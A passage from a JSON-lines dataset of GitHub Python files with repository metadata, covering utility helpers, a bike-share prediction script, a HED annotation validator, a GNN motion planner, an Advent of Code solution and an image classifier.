fp.write(result)\n\n\ndef load_json_file(filename):\n record_list = list()\n with open(filename, \"r\", errors=\"ignore\") as fp:\n for line in fp.readlines():\n record_list.append(json.loads(line))\n \n return record_list\n\n\ndef save_pickle_file(data, filename):\n with open(filename, \"wb\") as fp:\n pickle.dump(data, fp)\n\n\ndef load_pickle_file(filename):\n data = None\n with open(filename, \"rb\") as fp:\n data = pickle.load(fp)\n\n return data\n\n\ndef get_line_cnt(path):\n cnt = None\n with open(path, \"r\", errors=\"ignore\") as fp:\n cnt = len(fp.readlines())\n return cnt\n\n\ndef create_directories(path_list):\n # path_list: a list of paths in the current directory in string format\n for path in path_list:\n pathlib.Path(path).mkdir(parents=True, exist_ok=True)\n\n\ndef remove_directories(path_list):\n # path_list: a list of paths in the current directory in string format\n for path in path_list:\n if os.path.exists(path): shutil.rmtree(path)\n\n\n\ndef print_long_text(text, max_char=50):\n cnt = 0\n result = \"\"\n for token in re.split(r\"\\s+\", text):\n cnt += len(token)\n result += token + \" \"\n if cnt >= max_char:\n cnt = 0\n result += \"\\n\"\n \n print(result)\n\n\ndef print_k_per_line(lst, k=5):\n result = \"\"\n for idx, item in enumerate(lst):\n result += f\"{item}, \"\n if (idx + 1) % k == 0:\n print(result)\n result = \"\"\n print(result)\n\n\ndef convert_text_to_shake(text):\n return hashlib.shake_128(bytes(text, encoding=\"raw_unicode_escape\")).hexdigest(5)\n\n\ndef generate_random_string(k):\n return \"\".join(random.sample(string.punctuation + string.ascii_letters + \" \", k))\n\n\ndef generate_random_sentence():\n lst = [\" \".join(tokens) for tokens in corpus.gutenberg.sents('shakespeare-macbeth.txt') if len(tokens) >= 10]\n return random.choice(lst)\n\n\ndef print_tuple(tuple_list, max_char_length=50):\n # extended version of print_triplet() that accepts tuple of any length\n # tuple_list: [(a1, b1, c1, d1,...), (a2, b2, c2, d2,...), ...]\n\n # if any of the tuple has more than n_token tokens, ignore extra tokens\n n_token = min(map(len, tuple_list))\n token_list_dict = defaultdict(list)\n\n length = 0\n full_string = \"\"\n string_format = \"\"\n for tup in tuple_list: \n # length \n max_len = max(map(len, tup))\n length += max_len\n\n # print format\n string_format += \"{:<%d\" % (max_len + 2) + \"}\"\n\n for i in range(n_token): token_list_dict[i].append(tup[i])\n\n if length >= max_char_length:\n # append\n for token_list in token_list_dict.values():\n full_string += \"%s\\n\" % string_format.format(*token_list)\n full_string += \"\\n\"\n\n # reset\n length = 0\n string_format = \"\"\n token_list_dict = defaultdict(list)\n \n # when remaining tokens is shorter than max_char_length, append remaining tokens\n for token_list in token_list_dict.values():\n full_string += \"%s\\n\" % string_format.format(*token_list)\n\n print(full_string)\n\n\n# in case the transformers.trainer_utils do not have this function\ndef get_last_checkpoint(folder):\n PREFIX_CHECKPOINT_DIR = \"checkpoint\"\n _re_checkpoint = re.compile(r\"^\" + PREFIX_CHECKPOINT_DIR + r\"\\-(\\d+)$\")\n\n content = os.listdir(folder)\n checkpoints = [\n path\n for path in content\n if _re_checkpoint.search(path) is not None and os.path.isdir(os.path.join(folder, path))\n ]\n if len(checkpoints) == 0:\n return\n return os.path.join(folder, max(checkpoints, key=lambda x: int(_re_checkpoint.search(x).groups()[0])))\n\n\ndef get_folder_name(path, n_digit=3):\n pattern =\"\\d{\" + f\"{n_digit}\" + \"}\"\n folders = [folder.name for folder in filter(lambda folder: folder.is_dir() and re.match(pattern, folder.name),\n list(pathlib.Path(path).glob(\"*\")))]\n \n max_folder_number = 0\n if folders: max_folder_number = max([int(folder.lstrip(\"0\")) for folder in folders])\n\n return str(max_folder_number + 1).zfill(3)\n\ndef get_latest_file(folder):\n current_time = time.time()\n filename_dict = {\n filename: current_time - float(filename.stem) for filename in folder.glob(\"*.json\")\n if filename.stem.isdigit() and not os.path.isdir(filename)\n }\n\n latest_file = min(filename_dict, key=filename_dict.get) if filename_dict != dict() else None\n\n return latest_file\n\n####################################################################################################\n\ndef parse_termcolor_color(text):\n # termcolor only supports limited number of colors (https://pypi.org/project/termcolor/)\n # the colors are specified by syntax: \\x1b[3m\\x1b[0m, where idx refers to a color\n\n prefix_pattern = \"\\\\x1b\\[3(\\d)m\"\n suffix_pattern = \"\\\\x1b\\[0m\"\n\n colors = ['grey', 'red', 'green', 'yellow', 'blue', 'magenta', 'cyan', 'white']\n\n try:\n search_result = re.search(prefix_pattern, text)\n color = ImageColor.getrgb(colors[int(search_result[1])])\n except Exception:\n color = (0, 0, 0)\n\n for pattern in [prefix_pattern, suffix_pattern]: text = re.sub(pattern, \"\", text)\n \n return text, color\n\n\ndef convert_text_to_image(textfile_path):\n # adapated from: https://stackoverflow.com/a/29775654/7784797\n # usage:\n # path = random.choice(list(pathlib.Path(\"data/\").glob(\"*.txt\")))\n # image = convert_text_to_image(path)\n # image.show()\n # image.save('content.png')\n\n PIL_GRAYSCALE = 'L'\n PIL_RGB = \"RGB\"\n PIL_WIDTH_INDEX = 0\n PIL_HEIGHT_INDEX = 1\n\n with open(textfile_path) as f:\n lines = tuple(line.rstrip() for line in f.readlines())\n\n try:\n font = ImageFont.truetype(\"DejaVuSansMono.ttf\", size=20)\n except IOError:\n font = ImageFont.load_default()\n\n # make a sufficiently sized background image based on the combination of font and lines\n font_points_to_pixels = lambda pt: round(pt * 96.0 / 72)\n margin_pixels = 20\n\n # height of the background image\n tallest_line = max(lines, key=lambda line: font.getsize(line)[PIL_HEIGHT_INDEX])\n max_line_height = font_points_to_pixels(font.getsize(tallest_line)[PIL_HEIGHT_INDEX])\n realistic_line_height = max_line_height * 0.8 # apparently it measures a lot of space above visible content\n image_height = int(math.ceil(realistic_line_height * len(lines) + 2 * margin_pixels))\n\n # width of the background image\n widest_line = max(lines, key=lambda s: font.getsize(s)[PIL_WIDTH_INDEX])\n max_line_width = font_points_to_pixels(font.getsize(widest_line)[PIL_WIDTH_INDEX])\n image_width = int(math.ceil(max_line_width + (2 * margin_pixels)))\n\n # draw the background\n # background_color = 255 # white\n # image = Image.new(PIL_GRAYSCALE, (image_width, image_height), color=background_color)\n \n background_color = (255, 255, 255)\n image = Image.new(PIL_RGB, (image_width, image_height), color=background_color)\n draw = ImageDraw.Draw(image)\n\n # draw each line of text\n horizontal_position = margin_pixels\n\n for i, line in enumerate(lines):\n vertical_position = int(round(margin_pixels + (i * realistic_line_height)))\n\n # NOTE: 15 is a magic number here\n line = line.replace(\"\\t\", \" \" * 8)\n start_position = horizontal_position + 15 * (len(line) - len(line.lstrip()))\n\n text, font_color = parse_termcolor_color(line)\n\n # specify color: https://pillow.readthedocs.io/en/stable/reference/ImageDraw.html#colors\n draw.text((start_position, vertical_position), text.strip(), fill=font_color, font=font)\n\n return image\n\n####################################################################################################\n\ndef set_pandas_display(max_colwidth=100):\n pd.options.display.max_rows = None\n pd.options.display.max_colwidth = max_colwidth\n pd.options.display.max_columns = None\n\n\n####################################################################################################\n\ndef preprocess_text(text):\n # remove links\n pattern = re.compile(r'https?://\\S+|www\\.\\S+')\n text = pattern.sub(r'', text)\n\n # remove stop words\n pattern = re.compile(r'\\b(' + r'|'.join(corpus.stopwords.words('english')) + r')\\b\\s*')\n text = pattern.sub(r'', text)\n\n # remove emojis\n pattern = re.compile(\"[\"\n u\"\\U0001F600-\\U0001F64F\"\n u\"\\U0001F300-\\U0001F5FF\"\n u\"\\U0001F680-\\U0001F6FF\"\n u\"\\U0001F1E0-\\U0001F1FF\"\n u\"\\U00002702-\\U000027B0\"\n u\"\\U000024C2-\\U0001F251\"\n \"]+\", flags=re.UNICODE)\n text = pattern.sub(r'', text)\n\n # remove HTML tags\n text = BeautifulSoup(text, \"lxml\").get_text()\n\n # remove speacial characters (for example, punctuations)\n text = re.sub(r\"[^a-zA-Z\\d]\", \" \", text)\n\n # remove extra spaces\n text = re.sub(' +', ' ', text)\n\n # remove space at the beginning and the end\n text = text.strip()\n\n return text\n\n\ndef update_json_options(filename, option_dict):\n with open(filename, \"r\") as fp:\n data = json.load(fp)\n\n for key in option_dict.keys():\n if key not in data.keys(): continue\n data[key] = option_dict[key]\n \n with open(filename, \"w\") as fp:\n json.dump(data, fp, indent=4, sort_keys=True)\n\n\ndef seed_everything(seed=42):\n os.environ[\"PYTHONHASHSEED\"] = str(seed)\n\n np.random.seed(seed)\n random.seed(seed)\n torch.manual_seed(seed)\n torch.cuda.manual_seed(seed)\n \n torch.backends.cudnn.deterministic = True\n torch.backends.cudnn.benchmark = True\n\n\ndef load_image_dataloader(name=\"mnist\", size=100, batch_size=8):\n transform = transforms.Compose([transforms.ToTensor()])\n\n if name == \"mnist\":\n dataset = datasets.MNIST(\".\", download=True, train=True, transform=transform)\n if name == \"cifar10\":\n dataset = datasets.CIFAR10(\".\", download=True, train=True, transform=transform)\n\n train_idx, val_idx = train_test_split(\n np.random.choice(np.arange(len(dataset)), size),\n test_size=0.2, \n shuffle=True\n )\n train_sampler = SubsetRandomSampler(train_idx)\n val_sampler = SubsetRandomSampler(val_idx)\n\n train_dataloader = DataLoader(dataset, batch_size=batch_size, shuffle=False, sampler=train_sampler)\n val_dataloader = DataLoader(dataset, batch_size=batch_size, shuffle=False, sampler=val_sampler)\n \n\n return train_dataloader, val_dataloader\n\n\ndef load_dummy_network(num_input=784, num_class=10):\n return nn.Sequential(\n nn.Linear(num_input, 100),\n nn.ReLU(),\n nn.Linear(100, num_class)\n )\n\n\ndef show_file_change(filename):\n delta = timedelta(seconds=time.time() - os.stat(filename).st_mtime)\n print(\"The file {} was updated {} seconds ago\".format(filename, delta.seconds))\n\n####################################################################################################\n# latex related\n\ndef limit_length(text, max_len=30):\n output = \"\"\n for i in range(0, len(text), max_len):\n output = output + \"\\\\\\\\ \" + text[i:i+max_len]\n \n output = \"\\makecell[l]{\" + output.strip(\"\\\\\\\\\") + \"}\"\n return output\n\n\ndef make_cell(text1, text2, max_len=None):\n if max_len:\n text1 = limit_length(text1, max_len)\n text2 = limit_length(text2, max_len)\n\n return r\"\\begin{tabular}{@{}l@{}}\" + f\"{text1}\" + r\"\\\\\" + f\"{text2}\" + r\"\\end{tabular}\"\n\n\ndef escape_chars(text):\n chars = [\"$\", \"_\", \"{\", \"}\", \"%\"]\n for c in chars: text = text.replace(c, f\"{c}\")\n\n return text","repo_name":"guanqun-yang/testaug","sub_path":"utils/common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":13123,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"72"} +{"seq_id":"13722108944","text":"#Jordan Makansi\r\n#CE 263N - Bike_share Analysis\r\n\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\nfrom sklearn.tree import DecisionTreeRegressor\r\nfrom sklearn.neighbors import KNeighborsClassifier\r\nfrom sklearn.cluster import KMeans\r\nfrom sklearn import linear_model\r\nimport csv\r\n\r\n# Get training data\r\ntrn_data = np.genfromtxt('midterm_train.csv', delimiter=',', skiprows=1, usecols=(1,2,3,4,5,6,7,8,9,10,11,12))\r\nyear_trn = trn_data[:,0].T\r\nmonth_trn = trn_data[:,1].T\r\nhour_trn = trn_data[:,2].T\r\nholiday_trn = trn_data[:,3].T\r\nweekday_trn= trn_data[:,4].T\r\nworking_trn = trn_data[:,5].T\r\nweather_type_trn = trn_data[:,6].T\r\ntemp_trn = trn_data[:,7].T\r\nfeels_like_trn = trn_data[:,8].T\r\nhumidity_trn = trn_data[:,9].T\r\nwindspeed_trn = trn_data[:,10].T\r\ncount_trn = trn_data[:,11]\r\n\r\n# Get testing data\r\ntest_data = np.genfromtxt('midterm_test.csv', delimiter=',', skiprows=1, usecols=(1,2,3,4,5,6,7,8,9,10,11))\r\nyear_test = test_data[:,0].T\r\nmonth_test = test_data[:,1].T\r\nhour_test = test_data[:,2].T\r\nholiday_test = test_data[:,3].T\r\nweekday_test= test_data[:,4].T\r\nworking_test = test_data[:,5].T\r\nweather_type_test = test_data[:,6].T\r\ntemp_test = test_data[:,7].T\r\nfeels_like_test = test_data[:,8].T\r\nhumidity_test = test_data[:,9].T\r\nwindspeed_test = test_data[:,10].T\r\n\r\n#Prediction 1 - Effect of Temperature, Humidity, Windspeed (6,7,8,9,10)\r\ntrn = trn_data[:,[6,7,8,9,10]]\r\nclf = DecisionTreeRegressor(max_depth=5, min_samples_leaf=5)\r\nclf.fit(trn,count_trn)\r\n\r\nneigh = KNeighborsClassifier(n_neighbors=10, weights='distance')\r\ntrn = trn_data[:,[8,9]]\r\ntest = test_data[:,[8,9]]\r\nneigh.fit(trn, count_trn)\r\npredict_1 = neigh.predict(test)\r\n\r\n#Prediction 2 - Effect of hour, weekday/weekend (2,4)\r\ntrn = trn_data[:,[2,4,11]]\r\ntest = test_data[:,[2,4]]\r\npredict_2 = []\r\ncluster_centers = []\r\n\r\n# For each hour, create a list of the counts \r\n\r\nfor hour in range(24):\r\n x=[]\r\n for row in range(len(trn)):\r\n if trn[row][0]==hour:\r\n x.append(trn[row][2])\r\n \r\n # create a K-means cluster object, with 2 clusters (weekend and weekday)\r\n k_means = KMeans(init='k-means++', n_clusters=2, n_init=10)\r\n result = k_means.fit(np.array(x)[np.newaxis].T)\r\n \r\n cluster_centers.append(k_means.cluster_centers_)\r\n\r\nfor row in range(len(test)):\r\n \r\n for hour in range(24):\r\n if test[row][0]==hour:\r\n if test[row][1]==6 or test[row][1]==7:\r\n predict_2.append(min(cluster_centers[hour][0],cluster_centers[hour][1]))\r\n else:\r\n predict_2.append(max(cluster_centers[hour][0],cluster_centers[hour][1]))\r\n\r\n#Prediction 3 - Effect of year, month (0,1)\r\ntrn = trn_data[:,[0,1,11]]\r\ntest = test_data[:,[0,1]]\r\nx=[]\r\ny=[]\r\npredict_3 = []\r\nfor month in range(1,24):\r\n if (month ==20):\r\n continue\r\n count=[]\r\n for row in range(len(trn)):\r\n if (trn[row][0]*12+trn[row][1] == month):\r\n count.append(trn[row][2])\r\n x.append([month])\r\n y.append([np.average(count)])\r\n\r\nclf = linear_model.LinearRegression()\r\nclf.fit(x,y)\r\nfor row in range(len(test)):\r\n if test[row][1]==8:\r\n predict_3.append(clf.intercept_+clf.coef_*(20))\r\n elif test[row][1]==12:\r\n predict_3.append(clf.intercept_+clf.coef_*(24))\r\n\r\n\r\n\r\n\r\n#Prediction 4 - Effect of holiday in December (3)\r\ntrn = trn_data[:,[11,1,3,5]]\r\ntest = test_data[:,[1,3,5]]\r\npredict_4 = []\r\nx=[]\r\nfor row in range(len(trn)):\r\n if trn[row][1]==12 and trn[row][2]==1:\r\n x.append(trn[row][0])\r\nk_means = KMeans(init='k-means++', n_clusters=1, n_init=10)\r\nk_means.fit(np.array(x)[np.newaxis].T)\r\ndec_hol = k_means.cluster_centers_\r\n#print dec_hol\r\nfor row in range(len(test)):\r\n if test[row][1]==1:\r\n predict_4.append(dec_hol)\r\n else:\r\n predict_4.append(0)\r\n\r\n#Weights from decision tree\r\ntrn = trn_data[:,[0,1,2,3,4,8,9,10]]\r\n\r\nclf = DecisionTreeRegressor(min_samples_leaf=5)\r\nclf.fit(trn,count_trn)\r\nweight_1 = clf.feature_importances_\r\n#print clf.feature_importances_\r\n\r\ntrn = trn_data[:,[0,1,2,4,8,9,10]]\r\nclf = DecisionTreeRegressor(min_samples_leaf=5)\r\nclf.fit(trn,count_trn)\r\nweight_2 = clf.feature_importances_\r\n\r\n# ----------------- UP TO HERE ----------------------------\r\n\r\n#Final prediction\r\ntest = test_data[:,[0,1,2,3,4,5,6,7,8,9,10]]\r\ncount_predict = []\r\nfor row in range(len(test)):\r\n if test[row][3]==1:\r\n count_predict.append(predict_1[row]*(weight_1[5]+weight_1[6]+weight_1[7])+predict_2[row]*(weight_1[2]+weight_1[4])+predict_3[row]*(weight_1[0]+weight_1[1])+predict_4[row]*weight_1[3])\r\n else:\r\n count_predict.append(predict_1[row]*(weight_2[4]+weight_2[5]+weight_2[6])+predict_2[row]*(weight_2[2]+weight_2[3])+predict_3[row]*(weight_2[0]+weight_2[1]))\r\n\r\n\r\n#Writing to a file\r\ndate = []\r\nwith open('midterm_test.csv','rb') as f:\r\n next(f)\r\n csvreader = csv.reader(f,delimiter = ',')\r\n for row in csvreader:\r\n date.append(row[0])\r\nf.close()\r\nhour = np.genfromtxt('midterm_test.csv', delimiter=',', skiprows=1, usecols=(3))\r\nwith open('prediction1.csv','w') as f:\r\n f.write(\"date,hour,count\\n\")\r\n for i in range(len(count_predict)):\r\n f.write(\"%s,%f,%f\\n\" % (date[i],hour[i],round(count_predict[i])))\r\n f.close()\r\n\r\n###### -------- DEBUGGING BREAK HERE ----\r\nimport sys\r\nsys.exit()\r\n","repo_name":"makansij/Data_Analysis","sub_path":"Final_Analysis_original.py","file_name":"Final_Analysis_original.py","file_ext":"py","file_size_in_byte":5277,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"26054532222","text":"from hed.models.model_constants import DefTagNames\nfrom hed.models.hed_group import HedTag, HedGroup\nfrom hed.errors.error_reporter import ErrorHandler\nfrom hed.errors.error_types import OnsetErrors\n\n\nclass OnsetMapper:\n \"\"\"\n Validator responsible for matching onset offset pairs up\n \"\"\"\n\n def __init__(self, def_mapper):\n self._def_mapper = def_mapper\n self._onsets = {}\n\n def check_for_onset_offset(self, hed_string_obj):\n \"\"\"\n Checks for an onset or offset tag in the given string and adds it to the current context if found.\n Parameters\n ----------\n hed_string_obj : HedString\n The hed string to check. Finds a maximum of one onset tag.\n\n Returns\n -------\n onset_issues: [{}]\n Issues found validating onsets. Out of order onsets, unknown def names, etc.\n \"\"\"\n onset_issues = []\n for found_onset, found_group in self._find_onset_tags(hed_string_obj):\n if not found_onset:\n return []\n\n def_tags, def_groups = self._find_def_tags(found_group)\n if not def_tags:\n onset_issues += ErrorHandler.format_error(OnsetErrors.ONSET_NO_DEF_TAG_FOUND, found_onset)\n continue\n\n if len(def_tags) > 1:\n onset_issues += ErrorHandler.format_error(OnsetErrors.ONSET_TOO_MANY_DEFS,\n tag=def_tags[0],\n tag_list=[tag for tag in def_tags[1:]])\n continue\n\n def_tag = def_tags[0]\n def_group = def_groups[0]\n children = [child for child in found_group.get_direct_children() if\n def_group != child and found_onset != child]\n max_children = 1\n if found_onset.short_base_tag.lower() == DefTagNames.OFFSET_KEY:\n max_children = 0\n if len(children) > max_children:\n onset_issues += ErrorHandler.format_error(OnsetErrors.ONSET_WRONG_NUMBER_GROUPS,\n def_tag,\n found_group.get_direct_children())\n continue\n\n if children:\n # Make this a loop if max_children can be > 1\n child = children[0]\n if not isinstance(child, HedGroup):\n onset_issues += ErrorHandler.format_error(OnsetErrors.ONSET_TAG_OUTSIDE_OF_GROUP,\n child,\n def_tag)\n\n # At this point we have either an onset or offset tag and it's name\n onset_issues += self._handle_onset_or_offset(def_tag, found_onset)\n\n return onset_issues\n\n def _find_onset_tags(self, hed_string_obj):\n for group in hed_string_obj.groups():\n for tag in group.tags():\n if tag.short_base_tag.lower() == DefTagNames.ONSET_KEY \\\n or tag.short_base_tag.lower() == DefTagNames.OFFSET_KEY \\\n and not tag.extension_or_value_portion:\n yield tag, group\n # only return one onset tag per group\n break\n\n def _find_def_tags(self, onset_group):\n def_tags = []\n def_groups = []\n for child in onset_group.get_direct_children():\n if isinstance(child, HedTag):\n if child.short_base_tag.lower() == DefTagNames.DEF_KEY:\n def_tags.append(child)\n def_groups.append(child)\n else:\n for tag in child.tags():\n if tag.short_base_tag.lower() == DefTagNames.DEF_EXPAND_KEY:\n def_tags.append(tag)\n def_groups.append(child)\n\n return def_tags, def_groups\n\n def _handle_onset_or_offset(self, def_tag, onset_offset_tag):\n is_onset = onset_offset_tag.short_base_tag.lower() == DefTagNames.ONSET_KEY\n full_def_name = def_name = def_tag.extension_or_value_portion\n placeholder = None\n found_slash = def_name.find(\"/\")\n if found_slash != -1:\n placeholder = def_name[found_slash + 1:]\n def_name = def_name[:found_slash]\n\n def_entry = self._def_mapper.get_def_entry(def_name)\n if def_entry is None:\n return ErrorHandler.format_error(OnsetErrors.ONSET_DEF_UNMATCHED, tag=def_tag)\n if bool(def_entry.takes_value) != bool(placeholder):\n return ErrorHandler.format_error(OnsetErrors.ONSET_PLACEHOLDER_WRONG, tag=def_tag,\n has_placeholder=bool(def_entry.takes_value))\n\n if is_onset:\n # onset can never fail as it implies an offset\n self._onsets[full_def_name.lower()] = full_def_name\n else:\n if full_def_name.lower() not in self._onsets:\n return ErrorHandler.format_error(OnsetErrors.OFFSET_BEFORE_ONSET, tag=def_tag)\n else:\n del self._onsets[full_def_name.lower()]\n\n return []\n\n def __get_string_ops__(self, **kwargs):\n string_validators = []\n string_validators.append(self.check_for_onset_offset)\n return string_validators\n\n def __get_tag_ops__(self, **kwargs):\n return []\n","repo_name":"hed-standard/hed2-python","sub_path":"hed2tools/hed/models/onset_mapper.py","file_name":"onset_mapper.py","file_ext":"py","file_size_in_byte":5473,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"23278234421","text":"import json\nfrom pprint import pprint\n\nif __name__ == '__main__':\n\n with open('data.json') as data_file:\n data = json.load(data_file)\n\n test = {\"Name\": 1, \"Test\": 2}\n\n for value in data[\"textAnnotations\"]:\n # description field is the identified word\n pprint(value[\"description\"])\n # boundingPoly/vertices gives the coordinates\n pprint(value[\"boundingPoly\"][\"vertices\"])\n","repo_name":"vhartman/ILikeFridgesBack","sub_path":"ocr/playground.py","file_name":"playground.py","file_ext":"py","file_size_in_byte":414,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"12408686673","text":"import torch\nfrom planner.learned_planner import LearnedPlanner\nfrom utils.utils import seed_everything, create_dot_dict, to_np\nfrom utils.graphs import knn_graph_from_points\n\nfrom planner.learned.model.GNN_static import GNNet\n\nfrom torch_sparse import coalesce\nfrom torch_geometric.nn import knn_graph\nfrom torch_geometric.data import Data\n\nfrom tqdm import tqdm as tqdm\nimport numpy as np\n\n\nclass GNNStaticPlanner(LearnedPlanner):\n def __init__(self, num_batch, model_args, k_neighbors=50, **kwargs):\n self.num_batch = num_batch\n self.model = GNNet(**model_args)\n self.k_neigbors = k_neighbors\n self.num_node = 0\n\n super(GNNStaticPlanner, self).__init__(self.model, **kwargs)\n self.device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n self.model.to(self.device)\n\n def _num_node(self):\n return self.num_node\n\n def _plan(self, env, start, goal, timeout, seed=0, **kwargs):\n\n seed_everything(seed=seed)\n self.model.eval()\n path = self._explore(env, start, goal, self.model, timeout, k=self.k_neigbors, n_sample=self.num_batch)\n\n return create_dot_dict(solution=path if len(path) else None)\n\n def create_graph(self):\n graph_data = knn_graph_from_points(self.points, self.k_neighbors)\n self.edges = graph_data.edges\n self.edge_index = graph_data.edge_index\n self.edge_cost = graph_data.edge_cost\n\n def create_data(self, points, obstacles, edge_index=None, k=50):\n goal_index = 1\n data = Data(goal=torch.FloatTensor(points[goal_index]))\n data.v = torch.FloatTensor(np.array(points))\n data.obstacles = torch.FloatTensor()\n\n if edge_index is not None:\n data.edge_index = torch.tensor(edge_index.T).to(self.device)\n else:\n # k1 = int(np.ceil(k * np.log(len(points)) / np.log(100)))\n edge_index = knn_graph(torch.FloatTensor(data.v), k=k, loop=True)\n edge_index = torch.cat((edge_index, edge_index.flip(0)), dim=-1)\n ### bi-directional graph\n data.edge_index, _ = coalesce(edge_index, None, len(data.v), len(data.v))\n\n # create labels\n labels = torch.zeros(len(data.v), 1)\n labels[goal_index, 0] = 1\n data.labels = labels\n\n return data\n \n @torch.no_grad()\n def _explore(self, env, start, goal, model_gnn, timeout, k, n_sample, loop=10):\n success = False\n path = []\n points = [start] + [goal] + env.robot.sample_n_free_points(n_sample) \n\n explored = [0]\n explored_edges = [[0, 0]]\n prev = {0: 0}\n\n while not success:\n\n data = self.create_data(points, env.get_obstacles(), k=k)\n self.num_node = len(data.v)\n policy = model_gnn(**data.to(self.device).to_dict(), loop=loop)\n policy = policy.cpu()\n\n policy[torch.arange(len(data.v)), torch.arange(len(data.v))] = 0\n policy[:, explored] = 0\n policy[np.array(explored_edges).reshape(2, -1)] = 0\n\n while policy[explored, :].sum() != 0:\n\n agent = policy[np.array(explored)[torch.where(policy[explored, :] != 0)[0]], torch.where(policy[explored, :] != 0)[1]].argmax()\n end_a, end_b = torch.where(policy[explored, :] != 0)[0][agent], torch.where(policy[explored, :] != 0)[1][agent]\n end_a, end_b = int(end_a), int(end_b)\n end_a = explored[end_a]\n explored_edges.extend([[end_a, end_b], [end_b, end_a]])\n if env.edge_fp(to_np(data.v[end_a]), to_np(data.v[end_b])):\n explored.append(end_b)\n prev[end_b] = end_a\n\n policy[:, end_b] = 0\n if end_b==1:\n success = True\n path = [end_b]\n node = end_b\n while node != 0:\n path.append(prev[node])\n node = prev[node]\n path.reverse()\n break\n else:\n policy[end_a, end_b] = 0\n policy[end_b, end_a] = 0\n\n self.check_timeout(timeout)\n\n if not success:\n # ----------------------------------------resample----------------------------------------\n new_points = env.sample_n_points(n_sample, need_negative=True)\n points = points + list(new_points)\n \n return list(data.v[path].data.cpu().numpy())\n\n\n\n","repo_name":"aaucsd/lemp","sub_path":"planner/learned/GNN_static_planner.py","file_name":"GNN_static_planner.py","file_ext":"py","file_size_in_byte":4591,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"72"} +{"seq_id":"72581041834","text":"def lines():\n words = []\n with open(\"input.txt\") as fp:\n line = fp.readline()\n while line:\n words.append(line)\n line = fp.readline()\n return words\n\n\n\ndef parse():\n pre_words = lines()\n wires = []\n for x in pre_words:\n wires.append(x.split(','))\n return wires\n\n\ndef draw_wire(wire):\n print(\"-----------------------------------------\")\n coord = {}\n index = [0, 0]\n for action in wire:\n a = action[0]\n number = int(action[1:])\n for i in range(number):\n if a == 'U':\n index = (index[0], index[1]+1)\n elif a == 'D':\n index = (index[0], index[1]-1)\n elif a == 'R':\n index = (index[0]+1, index[1])\n elif a == 'L':\n index = (index[0]-1, index[1])\n\n if index[0] in coord.keys():\n coord[index[0]].append(index[1])\n else:\n coord[index[0]] = [index[1]]\n \n \n return coord\n\n\n\ndef draw(wires):\n\n wire1 = draw_wire(wires[0])\n wire2 = draw_wire(wires[1])\n return (wire1, wire2)\n\n\ndef dist(x,y):\n return abs(0-x) + abs(0-y)\n\ndef solve():\n wires = parse()\n (a,b) = draw(wires)\n res = []\n print(len(a))\n print(len(b))\n for i in a.keys():\n if i in b.keys():\n for x in a[i]:\n if x in b[i]:\n res.append(dist(i, x))\n return min(res)\nprint(solve())","repo_name":"Barisimre/AdventOfCode2019","sub_path":"3-1.py","file_name":"3-1.py","file_ext":"py","file_size_in_byte":1467,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"741726368","text":"from automato import automato\r\naf = automato(\r\n estados={'q0', 'q1', 'q2'},\r\n inicial='q0', finais={'q1'},\r\n transicoes={\r\n 'q0': {'0': 'q0', '1': 'q1'},\r\n 'q1': {'0': 'q0', '1': 'q2'},\r\n 'q2': {'0': 'q2', '1': 'q1'}\r\n })\r\nprint(af.transicoes)\r\naf.testar_entrada('1')\r\n","repo_name":"Teyal/Language-Manipulation","sub_path":"testes/testsAF.py","file_name":"testsAF.py","file_ext":"py","file_size_in_byte":305,"program_lang":"python","lang":"ca","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"4827104601","text":"import os\r\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '2'\r\n\r\nfrom PIL import Image\r\nfrom keras.preprocessing.image import load_img, img_to_array\r\nimport numpy as np\r\nfrom keras.models import load_model\r\n\r\n\r\n\r\nmodel = load_model('FV.h5')\r\nlabels = {0: 'apple', 1: 'banana', 2: 'beetroot', 3: 'bell pepper', 4: 'cabbage', 5: 'capsicum', 6: 'carrot',\r\n 7: 'cauliflower', 8: 'chilli pepper', 9: 'corn', 10: 'cucumber', 11: 'eggplant', 12: 'garlic', 13: 'ginger',\r\n 14: 'grapes', 15: 'jalepeno', 16: 'kiwi', 17: 'lemon', 18: 'lettuce',\r\n 19: 'mango', 20: 'onion', 21: 'orange', 22: 'paprika', 23: 'pear', 24: 'peas', 25: 'pineapple',\r\n 26: 'pomegranate', 27: 'potato', 28: 'raddish', 29: 'soy beans', 30: 'spinach', 31: 'sweetcorn',\r\n 32: 'sweetpotato', 33: 'tomato', 34: 'turnip', 35: 'watermelon'}\r\n\r\nfruits = ['Apple', 'Banana', 'Bello Pepper', 'Chilli Pepper', 'Grapes', 'Jalepeno', 'Kiwi', 'Lemon', 'Mango', 'Orange',\r\n 'Paprika', 'Pear', 'Pineapple', 'Pomegranate', 'Watermelon']\r\nvegetables = ['Beetroot', 'Cabbage', 'Capsicum', 'Carrot', 'Cauliflower', 'Corn', 'Cucumber', 'Eggplant', 'Ginger',\r\n 'Lettuce', 'Onion', 'Peas', 'Potato', 'Raddish', 'Soy Beans', 'Spinach', 'Sweetcorn', 'Sweetpotato',\r\n 'Tomato', 'Turnip']\r\n\r\n\r\ndef processed_img(img_path):\r\n img = load_img(img_path, target_size=(224, 224, 3))\r\n img = img_to_array(img)\r\n img = img / 255\r\n img = np.expand_dims(img, [0])\r\n answer = model.predict(img)\r\n y_class = answer.argmax(axis=-1)\r\n print(y_class)\r\n y = \" \".join(str(x) for x in y_class)\r\n y = int(y)\r\n res = labels[y]\r\n print(res)\r\n return res.capitalize()\r\n\r\n\r\n\r\n","repo_name":"blizet/Fruit-and-Vegetable-Image-Recogntion","sub_path":"impo.py","file_name":"impo.py","file_ext":"py","file_size_in_byte":1697,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"40106704861","text":"\nimport 